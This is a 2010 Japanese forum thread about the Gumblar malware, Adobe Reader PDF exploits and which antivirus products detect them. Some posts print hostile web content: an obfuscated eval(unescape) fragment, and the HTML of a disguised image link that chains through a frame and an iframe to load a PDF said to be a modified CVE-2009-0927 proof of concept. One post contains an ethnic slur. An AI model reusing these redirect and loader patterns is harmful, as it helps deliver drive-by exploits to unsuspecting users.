ミリペン(千葉県) :2010/01/08(金) 15:33:19.08 ID:LZKMcHdY
168 :
モンキーレンチ(catv?) :2010/01/08(金) 15:46:49.22 ID:HTtcnhM9 BE:1765922459-2BP(7777)
>>168 シベリアで君の模倣犯が大暴れしてるよ
心当たりある?
170 :
モンキーレンチ(catv?) :2010/01/08(金) 15:49:23.93 ID:HTtcnhM9
171 :
硯(アラビア) :2010/01/08(金) 15:52:24.39 ID:biIh+wbf
172 :
モンキーレンチ(catv?) :2010/01/08(金) 15:54:51.85 ID:HTtcnhM9
1138406800/106はシラネ ソースコードを配布したのが不味かったのか・・・ ちなみに1262099561/188-189はどう考えても俺です、ありがとうございました
ガンブラー自己中心派
174 :
マイクロピペット(山口県) :2010/01/08(金) 16:02:04.52 ID:oTlGFwoN
踏んだことある中じゃレベル低いよなこのウイルス 今までで最強はbios破壊された奴だ お陰で立ち上がらなくなって初めてマザボのbios復旧機能が役にたった
175 :
丸天(catv?) :2010/01/08(金) 16:02:58.11 ID:xceqYztC
avira最強じゃね
176 :
綴じ紐(茨城県) :2010/01/08(金) 16:03:09.36 ID:T7myWTrZ
.l l \| | !ノートン先生 ! //U ヽ___/ パソコン蛾人 \ !!大激怒!! // U :::U: ぶっ壊れ(__) \ !!!!! / // ___ \ ::: たお! (__) \∧∧∧∧/ | | | U :::: (`Д´#) < ぶ パ > |U | | ::U: _| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....:::: /旦|――||// /| < 壊 コ > ヽ .....::::::::: ─────────< れ ン >────────── < _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬ (y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___ ⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\ うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || | ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/ ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
177 :
ダーマトグラフ(catv?) :2010/01/08(金) 16:06:05.47 ID:IU/s4x6H
>>171 Good bye 9010
すでにBBQされています(´・ω・`) -> [BBQ]Roasted(-_-)
焼き串美味しいです^^
>>174 それってXPより前?それともXP以降の話?
179 :
マイクロピペット(山口県) :2010/01/08(金) 16:08:11.21 ID:oTlGFwoN
181 :
ホールピペット(滋賀県) :2010/01/08(金) 16:17:43.80 ID:PZ2XT8cC
>>146 ウィルス検出通知 (VIRUS DETECTION)
指定したウェブページ中にコンピュータウィルスを検出しました。
あなたのコンピュータがウィルスに感染することを防ぐため、指定したウェブページの内容は表示されません。
このメッセージは、接続先のウェブサーバがウィルスに感染している可能性を示すものであり、あなたのコンピュータがウィルスに感染していることを示してはいません。
Computer virus was detected from the contents of this web page.
This page is not displayed to prevent computer virus from infecting your computer.
This message inform that the connected web server may be infected with virus.
And this message does not inform that your computer is infected.
VIRUS NAME: Exploit.JS.Pdfka.aio
Powered by F-Secure Anti-Virus Gateway for Linux
|-゚)
182 :
包丁(東京都) :2010/01/08(金) 16:21:14.39 ID:GCS0qpTq
>>174 本物のウイルスと同じで致死性が高いと拡散しにくい
え?やばいの?テスト用なんでしょ・・・・・心配になってきた。
184 :
モンキーレンチ(catv?) :2010/01/08(金) 16:22:00.48 ID:HTtcnhM9
nod32以外糞 異論は認めへん
186 :
冷却管(catv?) :2010/01/08(金) 16:26:10.28 ID:BLtoVUOt
(){eval(unescape(('Script(t,'%')))})(/./g);
188 :
ばね(兵庫県) :2010/01/08(金) 16:29:35.94 ID:B2n63oG4
>>145 VISTAで踏んだところものすごくファンファン言った
感染してるの?
189 :
二又アダプター(愛知県) :2010/01/08(金) 16:30:08.60 ID:oDixb6wY
190 :
モンキーレンチ(catv?) :2010/01/08(金) 16:30:22.21 ID:HTtcnhM9
>>183 あのPDFはCVE-2009-0927のPoCを弄った物だお
→実行されたとしてもダイアログを表示するだけ←
そんなに心配ならソースコードうpするお・・・
>>190 サンクス。本当のやつかと思ったので。
>>186 そういうことは止めなさい。日本人の良心って破綻してる。朝鮮人の事言えないなw
192 :
手枷(静岡県) :2010/01/08(金) 16:36:12.62 ID:mDUjRL0s
あ、ごめん。ほんとうのレジストリ復旧のやつぽい(^^ゞ だめだ。最近、どうもZIPだの見ると疑ってしまう ORZ
あ〜なんだ。やっぱりそうかいw
196 :
ばね(兵庫県) :2010/01/08(金) 16:39:52.53 ID:B2n63oG4
>>145 これ踏んだ奴はオンラインスキャンしとけ
仕込まれてるぞ
197 :
印章(神奈川県) :2010/01/08(金) 16:41:55.64 ID:slVytE34
持ってて良かったJane
198 :
フライパン(catv?) :2010/01/08(金) 16:42:13.25 ID:+3qfZx57
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
____.____ | .__ いらないPCを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
>>186 | |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
――――――――――‐┬┘
|
____.____ |
| |..__ | |
| | |\_\. | |
| | | . |.◎ |つ |ミ ∧_∧
| | | . |: | | | (´・ω・)
>>187  ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ | ⊂ ⊂ )
⊂ ⊂ ,ノ
199 :
モンキーレンチ(catv?) :2010/01/08(金) 16:42:43.62 ID:HTtcnhM9
200 :
和紙(北海道) :2010/01/08(金) 16:42:56.14 ID:SY8AC1xP
ただの画像だろ? 画像踏んだだけでウイルスに感染するわけないじゃんwwww
201 :
試験管(静岡県) :2010/01/08(金) 16:44:55.88 ID:0TrH6utJ
>>145 専ブラでクリックしたら
Content-Type:text/html
と出るだけで、画像が表示されないです><
感染しちゃったの?><
してない
MSE使わないバカは何考えてるの?
>>145 MSEならExploit:JS/Mult.CDで検出できるよ。
MSE使ってたやつは感染してたろ 今対応してるかどうかより対応の早さが重要 MSEはその点駄目
206 :
ホワイトボード(中国地方) :2010/01/08(金) 17:01:43.14 ID:ZPAG/yBd
64bitOSでも感染するの
207 :
ラジオペンチ(福岡県) :2010/01/08(金) 17:03:43.11 ID:MfpFAFRp
FreeBSD俺に死角はなかった
こないだ起動しなくなって(真っ黒画面にカーソルだけピコピコ) 再インストールしたんだけどもしかして感染してた? ググったら症状まったく一緒なんだが・・・。 とりあえず考えられるもの全部最新のにして 2〜3日経ってるんだけど、なんかヤバいかな? 今、とりあえず、スキャンしてる
209 :
モンキーレンチ(catv?) :2010/01/08(金) 17:07:44.10 ID:HTtcnhM9
tp://neko2.net/uploda.org/?540332.jpg ↓ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=Shift_JIS"> <META http-equiv="Content-Style-Type" content="text/css"> <META name="Keywords" content=""> <META name="Description" content=""> <TITLE></TITLE> </HEAD> <FRAMESET rows="100%"> <FRAME name="main" src="tp://wavlac.net/oinari-uploader/src/oinari0223.html"> <NOFRAMES> <BODY> </BODY> </NOFRAMES> </FRAMESET> </HTML>
210 :
烏口(catv?) :2010/01/08(金) 17:08:00.14 ID:GmJikerv
211 :
画板(長屋) :2010/01/08(金) 17:13:58.57 ID:hmgBE72U
>>150 は実行したけど、すでに感染してるかをどうやって確認すりゃいいの?
AVG入れてるけど、金払ってねえから、あんまり役に立たないだろうし。
Adobeは自動即時アップデートを導入しろカス いちいち確認するのめんどいんだよ
214 :
ボウル(アラバマ州) :2010/01/08(金) 17:19:48.39 ID:zLrW2kLQ
こううスレを専ブラ以外で開こうとは思わない。
217 :
漁網(兵庫県) :2010/01/08(金) 17:23:30.36 ID:nY5mqsGu
218 :
モンキーレンチ(catv?) :2010/01/08(金) 17:30:02.03 ID:HTtcnhM9
>>209 tp://wavlac.net/oinari-uploader/src/oinari0223.html
↓
<iframe src="噂のup36170.pdf"></iframe>
・
・
・
220 :
モンキーレンチ(アラバマ州) :2010/01/08(金) 17:35:19.51 ID:QQXPUJsp
昨日再インストールして 今VistaSP2をウィルス対策ソフトなしで使ってる。 まぁユーザーアカウント入ってるしなんとかなるでしょ・・・・ いや・・・今日中にAVGイレマスヨ?
221 :
カッターナイフ(韓) :2010/01/08(金) 17:36:16.94 ID:7zC0pQL2
AVIRA最強
ウイルス対策どうのこうのより脆弱性さっさと修正しろよカス
223 :
モンキーレンチ(catv?) :2010/01/08(金) 17:44:04.77 ID:HTtcnhM9
>>219 何だよこのファイル
UPXで圧縮された上怪しげな文字列が・・・passwordって・・・
224 :
霧箱(アラバマ州) :2010/01/08(金) 17:44:58.01 ID:rO5nPoKM
やった!反応した!
225 :
霧箱(アラバマ州) :2010/01/08(金) 17:47:50.77 ID:rO5nPoKM
>>187 お前警察に通報したからな
プロバに連絡して対処してくれるって警察の人が言ってた
226 :
メスピペット(東日本) :2010/01/08(金) 17:49:07.25 ID:ckOb/0qK
227 :
蛍光ペン(長屋) :2010/01/08(金) 17:53:55.57 ID:YDMEhqGi
まさにGPL汚染 スクリプトを使って全てのライセンスをGPLにするつもりだな。
いいえ 男女兼用です
229 :
モンキーレンチ(catv?) :2010/01/08(金) 18:03:14.23 ID:HTtcnhM9
Aviraありがたい
232 :
蛍光ペン(長屋) :2010/01/08(金) 18:10:36.07 ID:YDMEhqGi
234 :
メスピペット(東日本) :2010/01/08(金) 18:13:05.37 ID:ckOb/0qK
235 :
メスピペット(東日本) :2010/01/08(金) 18:15:27.46 ID:ckOb/0qK
ただ既に
>>1 のサイトは感染に気づいて修正した模様
ドクター中松のサイトが新種に感染ってマジ?
237 :
おろし金(中部地方) :2010/01/08(金) 18:32:05.66 ID:ljvBIV7x
238 :
ファイル(神奈川県) :2010/01/08(金) 18:39:20.67 ID:0N1RPMCW
なに、ガンプラの話をしにきた俺は帰ったほうがいいの?
240 :
手枷(静岡県) :2010/01/08(金) 18:43:06.16 ID:mDUjRL0s
HGUCガンブラスター (´・д・`)マダー?
一応行っておくけど今回のはUAC有効でも危ないからな 気をつけろよ
242 :
真空ポンプ(愛知県) :2010/01/08(金) 18:51:56.42 ID:XrN2qS1/
警告音まじ心臓に悪すぎ・・・
243 :
金槌(茨城県) :2010/01/08(金) 18:53:38.32 ID:TJ0kbOS4
何かこのスレでAviraが反応するんだけど モッフルのサイト踏んでJava起動しちゃってたけど大丈夫かな
ガンブラーに感染してるかどうかって どうやってわかるの?
245 :
薬さじ(catv?) :2010/01/08(金) 18:57:38.44 ID:2RR2xXkm
まだだ!たかがメインPCをやられただけだ!
246 :
ウィンナー巻き(アラバマ州) :2010/01/08(金) 19:00:10.80 ID:OzZuWk66
最近多すぎる 2ちゃん以外閲覧しない方がいいな 貼られたリンクも踏まない
247 :
冷却管(広島県) :2010/01/08(金) 19:01:48.41 ID:qrGub+6x
GENOって感染したらどうなんの?
今回の8080系に感染するとtelnetサーバー立てられてリモートからPCのなか丸裸 IDは全部盗まれ、ショッピングで入力したならクレカもヤバい、悪人にPC貸し出した状態
249 :
冷却管(広島県) :2010/01/08(金) 19:09:36.85 ID:qrGub+6x
リカバリインストールしたら駆除できる?
クリーンインストールなら「たぶん」大丈夫、絶対は無い でもそれしか回復方法は無い
251 :
モンキーレンチ(catv?) :2010/01/08(金) 19:36:12.87 ID:HTtcnhM9
253 :
鉋(東京都) :2010/01/08(金) 20:21:37.95 ID:9oh1Ia5x
>>252 telnetなんて一言も出てないようだが?
最近のウイルスは総合型だからね 感染経路も感染後の行動も複雑
255 :
モンキーレンチ(アラバマ州) :2010/01/08(金) 21:12:52.08 ID:PO6/SsZN
256 :
綴じ紐(茨城県) :2010/01/08(金) 21:36:59.62 ID:T7myWTrZ
Operaなら感染しないって本当?
260 :
モンキーレンチ(アラバマ州) :2010/01/08(金) 23:11:18.46 ID:PO6/SsZN
>>259 調べたらいつのまにかWebWasherが買収されてたのか
261 :
テープ(catv?) :2010/01/08(金) 23:18:54.74 ID:cEc24PG4
,.へ ___ ム i 「 ヒ_i〉 ゝ 〈 ト ノ iニ(() i { ____ | ヽ i i /__, , ‐-\ i } | i /(●) ( ● )\ {、 λ ト−┤. / (__人__) \ ,ノ  ̄ ,! i ゝ、_ | ´ ̄` | ,. '´ハ ,! . ヽ、 `` 、,__\ /" \ ヽ/ \ノ ノ ハ ̄r/:::r―--―/::7 ノ / ヽ. ヽ::〈; . '::. :' |::/ / ,. " `ー 、 \ヽ::. ;:::|/ r'" / ̄二二二二二二二二二二二二二二二二ヽ | 答 | M a c 大 勝 利 │| \_二二二二二二二二二二二二二二二二ノ
262 :
土鍋(dion軍) :2010/01/09(土) 00:20:07.07 ID:ycjMYHFr
>>146 ブラクラ登録しようとしたら対象をファイルに保存をクリックしちまった
263 :
はさみ(千葉県) :2010/01/09(土) 00:20:33.28 ID:DM0nybdb
スレの勢いもやるきねーな
264 :
はさみ(千葉県) :2010/01/09(土) 00:21:13.98 ID:DM0nybdb
誤爆した
265 :
錐(神奈川県) :2010/01/09(土) 00:22:18.29 ID:xbLk6A/z
デザイン改悪しないでMGナイチンゲール出せよ
266 :
じゃがいも(関西) :2010/01/09(土) 00:29:10.32 ID:FPgPdrn5
やはり携帯最強
267 :
マイクロピペット(東日本) :2010/01/09(土) 01:12:53.25 ID:j8fcVN5V
268 :
ロープ(茨城県) :2010/01/09(土) 03:05:07.44 ID:AOe+tnV+
>>214 ウイルスの原因になってるアドビは潰れた方がいいと思うよ
ソフトは全部フリー化という方向で
269 :
平天(熊本県) :2010/01/09(土) 03:09:15.18 ID:H7DZhuri
>>268 我が家では、ずっと前から全てフリーだけど。
270 :
鑢(東京都) :2010/01/09(土) 03:10:36.73 ID:0Fd1Ky5b
>>268 冷静に考えたらwindows以外は無料ソフトだった
>>269 いや、アドビがさっさと潰れて公式にフリー化しろってこと
そうすりゃFirefoxみたいに早急なバグフィクスができるから
>>270 中国には「Windows大家族」というのがあってだな…
272 :
鑢(東京都) :2010/01/09(土) 03:18:14.76 ID:0Fd1Ky5b
273 :
てこ(東日本) :2010/01/09(土) 06:03:41.89 ID:UiWIjeBd
274 :
土鍋(東京都) :2010/01/09(土) 09:44:50.83 ID:SaUhvDnI
お前らいったいどこでウイルスについて学んだんだよ 教えt
275 :
ガラス管(沖縄県) :2010/01/09(土) 09:52:49.03 ID:RbBZ7cW9 BE:2362133298-2BP(1167)
>>274 朝から晩までPCの前で自宅警備してたら自然に覚えたよ
aviraの俺に隙はない
とりあえずjavascript無効にしたadobe Readerを緊急リリースして その後で対策版を出せばいいのに悠長だよね
278 :
土鍋(東京都) :2010/01/09(土) 10:38:02.90 ID:SaUhvDnI
>>275 どこからとっかかっていいか分からないんだけど
279 :
ガラス管(沖縄県) :2010/01/09(土) 11:02:50.26 ID:RbBZ7cW9 BE:1837214887-2BP(1167)
>>278 まず感染するだろ?
そしたら次は、何とか駆除しようと思って無駄な努力を繰り返すじゃん
そういう無駄な努力が積み重なって、気づいたら知識だけが残るんだよ(´・ω・`)
280 :
お玉(東京都) :2010/01/09(土) 11:09:03.21 ID:FSzUW/4r
てすと
281 :
カッター(東京都) :2010/01/09(土) 11:12:48.88 ID:kvrFg2bT
変なものをスレに張らないでくれよ。 このスレ開いたらGDATAさんがブロックして見られなかったぞ。
アンチvista厨のXP厨涙目wwwwwwwwwwwww
283 :
鉤(dion軍) :2010/01/09(土) 11:19:15.64 ID:8vRQup75
Windows7販促キャンペーンか
7はともかく7のα版は・・・
286 :
プライヤ(埼玉県) :2010/01/09(土) 11:21:06.62 ID:6rqzUpu0
>>1 感染サイト?開いたけど何も反応しないじゃん。
287 :
刹那's☆ ◆SETSUNA2ArLs :2010/01/09(土) 11:21:52.29 ID:WfjBT3Hr BE:298206432-S★(504700)
おい!avast!駄目なのか??(^_^;)。 ...!教えろν速民
JavaScript使ってるPDFって見たことがないんだけど・・・ どんな感じなの
289 :
ペーパーナイフ(catv?) :2010/01/09(土) 11:31:00.62 ID:Pbvc+upq
アンチウイルスは最後の砦ですよ
291 :
刹那's☆ ◆SETSUNA2ArLs :2010/01/09(土) 11:53:59.37 ID:WfjBT3Hr BE:3131163397-S★(504700)
>>289 どうやって対処するんすか!?
どんなふうにしていいかわからない…けど、頑張れば(^ω^)((爆))です
さすがのν速民でも駄目なのかうぬ!過去Jane誤作動したよなavast氏は
過去もあるし様子みすね〜な見解!とりまありがとでつ\(^O^)/@氏にはがばて
貰いたいでつ〜
292 :
ペーパーナイフ(catv?) :2010/01/09(土) 12:05:08.35 ID:Pbvc+upq
293 :
大根(アラビア) :2010/01/09(土) 12:06:51.26 ID:xLTAcwf3
おい!アバストさんが騒いだぞ!
294 :
スターラー(アラバマ州) :2010/01/09(土) 12:09:26.27 ID:HpBQ53ce
ケロロスレ?
295 :
ペーパーナイフ(catv?) :2010/01/09(土) 12:18:40.03 ID:Pbvc+upq
>>293 >>23 にスクリプトが貼られてるから=逆に考えればAvast!が有効ということ
(テキストだから悪さはしない 心配無用)
つかJaneのログフォルダは、Avast!に限らず除外設定にいれとこうな
296 :
定規(アラバマ州) :2010/01/09(土) 12:20:06.27 ID:RB2+OewL
てかavastはまだ対応されてないの?
297 :
振り子(兵庫県) :2010/01/09(土) 12:22:11.81 ID:OpBax4+Z
298 :
ペーパーナイフ(catv?) :2010/01/09(土) 12:22:32.98 ID:Pbvc+upq
299 :
刹那's☆ ◆SETSUNA2ArLs :2010/01/09(土) 12:25:06.23 ID:WfjBT3Hr BE:1192824746-S★(504700)
300 :
ファイル(茨城県) :2010/01/09(土) 12:26:20.23 ID:VifxWfUT
具体的に何するウイルスだよ Web改竄されてて俺のPCに何する訳?
301 :
定規(アラバマ州) :2010/01/09(土) 12:30:05.42 ID:RB2+OewL
つかavastのオンアクセスの保護の設定って重いから全部普通にしてるんだけど、普通設定でも大丈夫かな? 高設定だと重いんだよね・・・
そもそもadobeのjavascriptって何してたの?
303 :
ばんじゅう(宮城県) :2010/01/09(土) 12:42:54.82 ID:QGuff+j8
readerのjavascriptをOFFにしても、おれみたいにacrobatは忘れちゃってる 可能性があるからな、お前らも気をつけろよ
304 :
ミリペン(関西地方) :2010/01/09(土) 12:46:12.60 ID:cEGswBFl
なぁ、俺の認識間違ってると思うんだが、情強のおまえらチェックしてくれ 俺が感染サイトを見る→俺が感染する→知らずに俺のサイトに俺がFTPでファイルうpする→勝手に改変コードを付け加えられる →俺のサイトを見た人が感染 なの? でもこれだとFTPのパスってもれてないよね
305 :
巻き簀(大阪府) :2010/01/09(土) 12:47:24.27 ID:uyvAvSWx
【レス抽出】 対象スレ:avast!のWebシールドでも反応しない新ガンブラーが登場 キーワード:ガンプラ 3 名前: ウケ(アラバマ州)[] 投稿日:2010/01/08(金) 02:45:14.02 ID:7h8EVcut ↓ガンプラかと思った 9 名前: ラベル(東京都)[] 投稿日:2010/01/08(金) 02:48:38.10 ID:1/1kKlEq オススメのガンプラない? 239 名前: 時計皿(神奈川県)[sage] 投稿日:2010/01/08(金) 18:42:35.89 ID:h1Nohgr4 なに、ガンプラの話をしにきた俺は帰ったほうがいいの? 抽出レス数:3
306 :
スケッチブック(東京都) :2010/01/09(土) 12:52:43.82 ID:iGD3z1KY
あぁ、何かしきりに21番と445番のポート叩いてくる奴らが居るなぁと思ったら、、、 こういうことか。面倒くさいなぁ
307 :
定規(アラバマ州) :2010/01/09(土) 12:54:17.89 ID:RB2+OewL
445番のポートってなんだっけ?
308 :
スケッチブック(東京都) :2010/01/09(土) 12:56:21.27 ID:iGD3z1KY
>>307 windowsのファイルプリンタ共有サービスとか
309 :
鉤(東京都) :2010/01/09(土) 12:56:43.65 ID:ffobTXdn
MSE最強ってことか
310 :
錘(東京都) :2010/01/09(土) 12:56:50.48 ID:/4mbiOPn
AVAST!にファイルをトロイ扱いされて消されまくってからAVAST!恐くて使えない。 もう平気なのか?
311 :
ドライバー(長屋) :2010/01/09(土) 12:57:23.57 ID:sSs+K87l BE:1194612285-PLT(12800)
312 :
ガラス管(沖縄県) :2010/01/09(土) 12:57:31.86 ID:RbBZ7cW9 BE:1476333959-2BP(1167)
正直445はルータで閉じてもいい気がする
313 :
ドライバー(熊本県) :2010/01/09(土) 12:58:43.00 ID:7iO+fC7T
ガンプラのスレじゃないのか・・・帰る
>>303 ソフトも関連付けられない男の人って・・
315 :
絵具(関東地方) :2010/01/09(土) 13:10:07.79 ID:IioKpeUH
>>310 いや今回の件で再導入したが、除外してなかったなんでもないファイルが消された、
316 :
ドライバー(長屋) :2010/01/09(土) 13:20:54.99 ID:sSs+K87l BE:358384043-PLT(12800)
>>315 winRARのライセンス認証させるソフトがトロイ扱いされるんだが。
317 :
錘(東京都) :2010/01/09(土) 13:23:02.36 ID:/4mbiOPn
318 :
ドライバー(長屋) :2010/01/09(土) 13:24:47.10 ID:sSs+K87l BE:537575292-PLT(12800)
>>317 ちなみにCPRM解除のソフトもトロイ扱いされるので注意。
avastは対応してないってスレ立てだよね 対応しているのはどれ?
321 :
すりこぎ(山梨県) :2010/01/09(土) 13:30:37.13 ID:GEWaBUZj
このスレを更新するたびに唸りをあげるavast!先生
感染したらどうなるんだよ
それはもう大変なことに
324 :
クリップ(catv?) :2010/01/09(土) 13:43:29.37 ID:m/dbXZL3
>>306 >>320 危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
>>324 そんなことしなくたってルータ入れれば簡単に鉄壁のFWできるぜ
326 :
ボンベ(石川県) :2010/01/09(土) 15:13:25.96 ID:5NbyV8Cq
いいかげんソフトウェアのアップデートはタスクで児童管理しろよ
327 :
ニッパ(関西地方) :2010/01/09(土) 15:15:53.13 ID:IB0CF2iY
avastってなんかわかりずらい AVGにしたらいい感じになった
ガンブラスターだと
信越放送ワロタww
見事なタイミングで信越放送のページ開いたわw そしてかたまったw アクロバットリーダもメモリもりもり使用量増えたんで強制終了w
>>145 これ踏んじゃったんだけどもう大丈夫なのか?
333 :
ビーカー(中部地方) :2010/01/09(土) 22:11:58.72 ID:98q5RkV5
>>332 そのneko2.netの短縮urlは後からジャンプ先を編集できるし、実際編集してる
だからもう大丈夫とかは無い
情強ならAcrobat ReaderやJavaのウェブブラウザplug-in機能は無効にしとけよ
335 :
クリップ(catv?) :2010/01/09(土) 23:01:49.33 ID:m/dbXZL3
336 :
土鍋(東京都) :2010/01/09(土) 23:03:29.14 ID:T76tVhNO
>>335 古いエロゲを大量にぶっこんだVMware上のWindowsMeが消えた
337 :
足枷(不明なsoftbank) :2010/01/09(土) 23:07:11.84 ID:xnkVMdE3
338 :
スタンド(dion軍) :2010/01/09(土) 23:16:30.30 ID:nSwfjhzi
フラッシュプレイヤーの無い俺に四角は無かった
339 :
蒸し器(東京都) :2010/01/09(土) 23:17:01.53 ID:rRND75xR
MSのアンチウイルスってどう?使ってる人いる?
340 :
加速器(東日本) :2010/01/09(土) 23:34:42.99 ID:h2asRdIe
MSEって更新もスキャンも時間かかるな 無料セキュリティーソフト使うの初めてだけど どれもこんなもんなのか
∩_∩ / \ /\ 人人人人人人人人人人人人人人人人人人人人人人 | (゚)=(゚) | < トロイの木馬 Win32:Delf-MZG[Trj] を検出しました > | ●_● | YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY / ヽ | 〃 ------ ヾ | \__二__ノ ∩ ∩ | | | | | |__| | / / ヽ \ / (゚) (゚) | | _○_ | \__ヾ . .:::/__ノ しw/ノ ___ / ̄ヽ/ \ / \/ ̄ヽ 人人人人人人人人人人人人人 | / (゚) (゚) | | < プァーンプァーンプァーンプァーンプァーン> | | 三 | | YYYYYYYYYYYYYYYYYYYY \_ノ\_ __ノ\_ノ | | | | (_,、_) しwノ
やべえな。しばらくリンク踏めないや。
344 :
アリーン冷却器(沖縄県) :2010/01/10(日) 03:40:09.47 ID:o+FvGDK+
これを期にカスペルスキーに乗り換えることにしました プァーンプァーンで心臓が止まる心配はなくなりそうです
345 :
ホッチキス(大阪府) :2010/01/10(日) 03:49:09.16 ID:S+d2/M90
346 :
霧箱(東日本) :2010/01/10(日) 03:50:25.22 ID:KmypLAb0
そのプァーンプァーンって聞いてみたいw
347 :
ビュレット(静岡県) :2010/01/10(日) 03:51:53.11 ID:a3ueXY8l
心臓に悪い音だよな
348 :
鑿(神奈川県) :2010/01/10(日) 03:52:59.92 ID:ddEqJ4lx
このスレを開いた瞬間avastが怒った
349 :
ウケ(広島県) :2010/01/10(日) 03:59:55.47 ID:8TzGn7kk
350 :
ウケ(広島県) :2010/01/10(日) 04:02:37.47 ID:8TzGn7kk
351 :
グラフ用紙(東京都) :2010/01/10(日) 04:05:08.07 ID:i4o12UOx
352 :
バールのようなもの(東京都) :2010/01/10(日) 04:06:20.42 ID:LtbsLP2f
>>350 なつかしいな
何度心臓止まりそうになった事かwww
>>350 マジかこれは最悪だな
ということで警告音だけプァーンプァーンに変えた
ガンプラって感染方法が脆弱性攻撃だろ? 普通のアンチウイルスじゃ汎用的に対応するのはそもそも無理で 脆弱性攻撃に特化したソフト入れとかないとヤバイぞ。
vistaでマカフィーだから関係ないなよしガンプラの話をしよう
356 :
時計皿(東京都) :2010/01/10(日) 04:32:30.72 ID:RKdUHhnM
avastは操作がわかりにくすぎる。
357 :
コンニャク(dion軍) :2010/01/10(日) 04:33:39.55 ID:Oo3Yp20u
古いosだからavastしか使えないや
358 :
ニッパ(不明なsoftbank) :2010/01/10(日) 04:34:27.26 ID:yoqGtUHk
こういうスレ開いて
>>1 のURLが紫だと何かこう
映画でスローモーションになった直後死ぬシーンを体験できるな
359 :
絵具(福島県) :2010/01/10(日) 05:27:10.41 ID:j3nLL+bi
警告音が怖すぎるからtada.wavに変えた
>>4 ウイルス開発したのはおそらくKingsoftなんだろうな
362 :
はさみ(アラバマ州) :2010/01/10(日) 14:37:57.87 ID:n+ozIy49
363 :
二又アダプター(アラバマ州) :2010/01/10(日) 16:32:12.16 ID:rXPvTZKK
avast!の本スレってIDが出ないせいかアンチが常駐してるのナw
364 :
オープナー(catv?) :2010/01/10(日) 16:35:37.87 ID:Zv9dMzwL
それAvast!に限った話じゃないよ
365 :
ニッパ(長屋) :2010/01/10(日) 16:38:59.22 ID:RVOekPgJ
セキュ板じゃ普通だな
366 :
テープ(神奈川県) :
2010/01/10(日) 16:39:36.32 ID:Jl8oclCQ Aviraのスレとか見てこいよw